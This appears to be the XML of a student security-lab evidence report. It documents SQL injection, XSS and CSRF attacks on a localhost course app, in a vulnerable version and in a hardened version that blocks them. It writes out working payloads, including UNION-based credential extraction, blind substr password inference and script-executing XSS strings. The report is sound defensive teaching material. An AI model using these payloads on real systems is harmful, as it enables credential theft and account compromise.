    <w:p w14:paraId="54C2CB7A"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2026-10-11T16:08:08.182Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5004E5A8"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http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+%27COLUMN%27%2Cname%2Ctype+FROM+pragma_table_info%28%27users%27%29+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EB2BCE"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1ED4202D">
          <v:shape id="_x0000_i1042" type="#_x0000_t75" style="width:388.5pt;height:395.25pt">
            <v:imagedata r:id="rId21" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC6C81"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23 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB7590"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Vulnerable Version Sql Injection Advanced Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A1A5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 UNION SELECT username,password,email FROM users -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7210326C"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Observed database response: AdminPass!26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B3E6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2026-10-11T16:08:08.840Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17453E3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http://localhost:8000/vulnerable/courses?q=%27+UNION+SELECT+username%2Cpassword%2Cemail+FROM+users+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FE319"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4AE32C59">
          <v:shape id="_x0000_i1043" type="#_x0000_t75" style="width:495pt;height:361.5pt">
            <v:imagedata r:id="rId22" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D68153E"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24 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03B939"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Vulnerable Version Normal Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5A768"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Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F54299B"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Legitimate course search still returns Information Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACCFD91"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2026-10-11T16:08:09.441Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552890D8"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http://localhost:8000/vulnerable/courses?q=Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1049A156"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08292F8C">
          <v:shape id="_x0000_i1044" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF252C"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25 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07020D63"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Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C840F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Application dashboard renders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41703D4F"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2026-10-11T16:08:10.173Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ECDEF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http://localhost:8000/safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F314B7E"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2F11BFD7">
          <v:shape id="_x0000_i1045" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId24" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="012A045B"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26 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F5D9E5"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XSS Reflected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B500EE"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&lt;svg onload="document.getElementById(`se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>arch-summary`).textContent=`REFLECTED XSS EXECUTED`"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF18E7E"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Literal payload rendered without execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F43E0F"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2026-10-11T16:08:11.123Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD8777"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endpoint: http://localhost:8000/safe/courses. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4294AF"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56F95480">
          <v:shape id="_x0000_i1046" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId25" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4EB6BE"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27 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC58790"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XSS DOM Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EE98EC"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&lt;img src=x onerror="document.getElementById('note-preview').textContent='DOM XSS EXECUTED'"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D6801"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Fragment rendered through textContent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BD924"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2026-10-11T16:08:12.028Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05E768"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endpoint: http://localhost:8000/safe/planner. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508B7CDD"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362B9196">
          <v:shape id="_x0000_i1047" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId26" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241FC56"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28 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A1EC0"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XSS Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA655F"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&lt;svg onload="this.parentElement.innerHTML='&lt;strong&gt;STORED XSS EXECUTED&lt;/strong&gt;'"&gt;&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FBB2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Saved payload is visible as literal text to another visitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B0E72"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2026-10-11T16:08:13.873Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B6185C"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http://localhost:8000/safe/discussion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD15F75"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407CEE3A">
          <v:shape id="_x0000_i1048" type="#_x0000_t75" style="width:495pt;height:390pt">
            <v:imagedata r:id="rId27" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47E3C4"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29 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9D55B"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Csrf Before</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257AE744"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Normal authenticated profile update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706E20F"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Original email persisted before the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1B48CB"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2026-10-11T16:08:14.546Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C46A96"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http://localhost:8000/safe/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539EA57"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13CBEC88">
          <v:shape id="_x0000_i1049" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId28" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFCA05"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30 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5956076B"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Csrf Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54677966"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External HTML form posts email=attacker@lab.invalid to localhost:8000 without a CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A91C9E"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Attacker form is hosted on a separate origin, localhost:8001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB95B8"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2026-10-11T16:08:15.047Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416B6FC9"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http://localhost:8001/safe?manual=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC57D9"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113DDF7F">
          <v:shape id="_x0000_i1050" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId29" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2F3E6"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31 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B43B71C"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Csrf Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD4B756"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External POST: email=attacker@lab.invalid; no CSRF token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8A5C59"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HTTP 403: authenticated forged request rejected by token and Origin checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0590C9"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2026-10-11T16:08:15.547Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990295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http://localhost:8000/safe/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8DC80A"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0DB3C68F">
          <v:shape id="_x0000_i1051" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId30" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4009A3"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32 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBEA288"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Csrf After</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6E2008"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External POST followed by authenticated profile verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECFD10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Original email remains unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45922E8A"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2026-10-11T16:08:16.026Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141044CB"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http://localhost:8000/safe/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BDF5C"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44D51100">
          <v:shape id="_x0000_i1052" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId31" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124AE6D"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33 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57447BEA"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Csrf Token Origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952A48F"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POST from http://localhost:8001 with session cookie but no token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727FF902"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HTTP 403: server-side token and Origin verification rejected the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3280B3B2"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2026-10-11T16:08:16.500Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A71C8"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http://localhost:8000/safe/profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6BCF64"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3CF9F78E">
          <v:shape id="_x0000_i1053" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId32" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFD89D"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34 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4625DC19"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SQL Injection Easy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3579757D"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username=admin' -- ; password=wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9CFE0D"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Invalid credentials; attack rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CAF0B2"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2026-10-11T16:08:17.227Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4880AA7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http://localhost:8000/safe/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17795C"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5C9AD229">
          <v:shape id="_x0000_i1054" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId33" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E977CC4"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35 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A237A"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Sql Injection Intermediate True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184FC29C"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ENR-2026-001' AND 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9927E"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No matching enrollment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A5D1FB"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2026-10-11T16:08:17.801Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975345E"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066DE1A"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3A7D44FD">
          <v:shape id="_x0000_i1055" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId34" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563711F"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36 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F79EC2"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Sql Injection Intermediate False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609252EA"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ENR-2026-001' AND 1=2 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883BE1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No matching enrollment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F4A99"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2026-10-11T16:08:18.405Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487DA0CE"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http://localhost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D2+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168ED4C8"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72CC6C6F">
          <v:shape id="_x0000_i1056" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId34" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0085BD40"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37 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B9E365"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Sql Injection Intermediate Infer A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755546F"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ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='A' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F951B4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No matching enrollment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26433E38"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2026-10-11T16:08:18.986Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6A742"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endpoint: http://localhost:8000/safe/enrollment. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B82AB"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2768C5F4">
          <v:shape id="_x0000_i1057" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId35" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34109EFB"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38 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAFDA3F"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Sql Injection Intermediate Infer Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154A5A4"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ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276336B5"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No matching enrollment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24368517"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2026-10-11T16:08:19.551Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C7F56"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endpoint: http://localhost:8000/safe/enrollment. Exact encoded URL is in verification.json.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CDDC5F"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797EDD35">
          <v:shape id="_x0000_i1058" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId36" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C0DAA"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39 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF514D6"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Sql Injection Advanced Columns Three</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D4D08"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 ORDER BY 3 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F0E5F9"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Literal search input; no injected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB378E5"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2026-10-11T16:08:20.119Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C31B132"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http://localhost:8000/safe/courses?q=%27+ORDER+BY+3+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1967BA5C"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12F9239B">
          <v:shape id="_x0000_i1059" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId37" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B65242E"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40 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3229BA80"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Sql Injection Advanced Columns Four</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E48669"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 ORDER BY 4 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B052FAE"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Literal search input; no injected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0102EF45"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2026-10-11T16:08:20.734Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1E15D"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http://localhost:8000/safe/courses?q=%27+ORDER+BY+4+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254F8893"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7AD7B3C4">
          <v:shape id="_x0000_i1060" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId38" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="773741E5"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41 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE7EDDF"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Sql Injection Advanced Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D4B44"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 UNION SELECT 'DATABASE',name,file FROM pragma_database_list -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D65F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Literal search input; no injected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401C9A27"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2026-10-11T16:08:21.349Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452AE9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http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27DATABASE%27%2Cname%2Cfile+FROM+pragma_database_list+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1300002B"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40186AD4">
          <v:shape id="_x0000_i1061" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId39" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02131F08"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42 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329A2C3B"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Sql Injection Advanced Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9FA15C"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 UNION SELECT 'TABLE',name,sql FROM sqlite_master WHERE type='table' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE33AC"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Literal search input; no injected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7810FA8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2026-10-11T16:08:21.929Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E677A29"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http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27TABLE%27%2Cname%2Csql+FROM+sqlite_master+WHERE+type%3D%27table%27+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6596D"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03C70DFA">
          <v:shape id="_x0000_i1062" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId40" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E617EF8"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43 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D50B7CC"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Sql Injection Advanced Columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA806CB"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 UNI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ON SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651972FC"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Literal search input; no injected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5D143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2026-10-11T16:08:22.556Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DCBC86"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http://localhost:8000/safe/courses?q=%27+UNION+SELECT+%27COLUMN%27%2Cname%2Ctype+FROM+pragma_table_info%28%27users%27%29+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64392BE8"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066FE3D3">
          <v:shape id="_x0000_i1063" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId41" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00564B36"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44 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099007A0"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Sql Injection Advanced Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758130A8"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 xml:space="preserve">Input or attack setup: ' UNION SELECT username,password,email FROM users -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783499B3"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Literal search input; no injected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F962B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2026-10-11T16:08:23.135Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4BBAC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http://localhost:8000/safe/courses?q=%27+UNION+SELECT+username%2Cpassword%2Cemail+FROM+users+--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A483628"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0D83CB61">
          <v:shape id="_x0000_i1064" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId42" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5297A4"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45 of 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9032D6" w14:textId="77777777" w:rsidR="007A75DC" w:rsidRDefault="007A75DC">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Safe Version Normal Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFB27CA"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Input or attack setup: Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A324760"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Observed result: Legitimate course search still returns Information Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E9034B"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Capture timestamp UTC: 2026-10-11T16:08:23.787Z. The screenshot footer displays PKT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373030C9" w14:textId="77777777" w:rsidR="007A75DC" w:rsidRDefault="007A75DC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Target URL: http://localhost:8000/safe/courses?q=Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC4F02" w14:textId="77777777" w:rsidR="007A75DC" w:rsidRDefault="007A75DC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="141E04C9">
          <v:shape id="_x0000_i1065" type="#_x0000_t75" style="width:495pt;height:344.25pt">
            <v:imagedata r:id="rId43" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFFDE37" w14:textId="77777777" w:rsidR="007A75DC" w:rsidRDefault="007A75DC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Page 46 of 46</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007A75DC">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="800" w:right="1000" w:bottom="800" w:left="10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A4882"/>
    <w:rsid w:val="007A75DC"/>
    <w:rsid w:val="00A820C7"/>
    <w:rsid w:val="00DA488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271FCE"/>
  <w14:defaultImageDpi w14:val="0"/>
  <w15:docId w15:val="{116BD03B-927D-4425-B34C-FBBB8E110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A488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DA4882"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="maj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3431</Words>
  <Characters>19563</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>163</Lines>
  <Paragraphs>45</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>22949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Muhammad Ibrahim</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-11T16:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-11T16:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>